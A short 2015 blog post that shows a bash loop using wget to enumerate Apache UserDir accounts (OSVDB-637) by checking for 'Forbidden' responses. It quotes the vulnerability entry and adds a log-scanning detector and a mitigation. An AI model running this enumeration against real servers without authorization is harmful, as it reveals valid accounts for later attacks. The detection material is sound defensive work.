Saturday, May 16, 2015

Bash Script to Enumerate Users - OSVDB-637

I ran a Nikto scan and found the following vulnerability in the report that it produces:

"OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users)."

I then created the following bash script to run through a list of usernames to identify users that may exist:

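#!/bin/bash
# Request ~username for each name in names.list and save wget's output per name.
mkdir -p output    # the redirect below fails if this directory is missing
while IFS= read -r line
do

     wget "http://www.domain.local/~$line" &> "output/$line.output.file"

done < names.list
# List the output files whose response contained 'Forbidden'.
grep -l -i 'forbidden' output/*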

The final grep statement then lists the output files, each named after the username that was requested, whose response contained 'Forbidden', indicating that the user account exists on that particular Apache server.

Below is the information about the vulnerability from the OSVDB database...

http://osvdb.org/637
Apache web servers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the UserDir module is enabled and a remote attacker requests access to a user's home directory. By monitoring the web server response, an attacker is able to enumerate valid user names, resulting in a loss of confidentiality.
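
A defender-side check for the behaviour described above, added here as an example and not part of the original post: it scans an Apache combined-format access log for clients that request many distinct ~username paths and get 403/404 answers. The log lines, IP addresses, usernames, function names and the threshold of 3 are constructed for illustration.

```shell
#!/bin/bash
# Added example: flag clients probing many distinct /~user paths in an
# Apache combined-format access log (the OSVDB-637 enumeration pattern).

# Constructed sample log lines (documentation IPs, made-up usernames).
sample_log() {
cat <<'EOF'
198.51.100.7 - - [16/May/2015:10:00:01 +0000] "GET /~alice HTTP/1.1" 403 209 "-" "Wget/1.16"
198.51.100.7 - - [16/May/2015:10:00:01 +0000] "GET /~bob HTTP/1.1" 404 205 "-" "Wget/1.16"
198.51.100.7 - - [16/May/2015:10:00:02 +0000] "GET /~carol/ HTTP/1.1" 404 205 "-" "Wget/1.16"
198.51.100.7 - - [16/May/2015:10:00:02 +0000] "GET /~dave HTTP/1.1" 403 209 "-" "Wget/1.16"
203.0.113.20 - - [16/May/2015:10:05:00 +0000] "GET /~alice/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.20 - - [16/May/2015:10:05:03 +0000] "GET /~alice/style.css HTTP/1.1" 200 90 "-" "Mozilla/5.0"
203.0.113.20 - - [16/May/2015:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
EOF
}

# detect_userdir_enum THRESHOLD < access.log
# Prints "ip distinct_users n403 n404" for every client that received
# 403/404 answers for at least THRESHOLD distinct ~user names.
detect_userdir_enum() {
    awk -v min="$1" '
    {
        ip = $1; status = $9
        if (status != 403 && status != 404) next   # the two telltale answers
        split($7, seg, "/")                        # "/~carol/x" -> "", "~carol", "x"
        user = seg[2]; sub(/\?.*/, "", user)       # drop any query string
        if (substr(user, 1, 1) != "~" || length(user) < 2) next
        if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
        if (status == 403) n403[ip]++; else n404[ip]++
    }
    END {
        for (ip in users)
            if (users[ip] >= min)
                printf "%s %d %d %d\n", ip, users[ip], n403[ip], n404[ip]
    }' | sort
}

sample_log | detect_userdir_enum 3
```

Where per-user directories are not needed, setting `UserDir disabled` in the Apache configuration removes the 403/404 difference that makes the enumeration possible.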

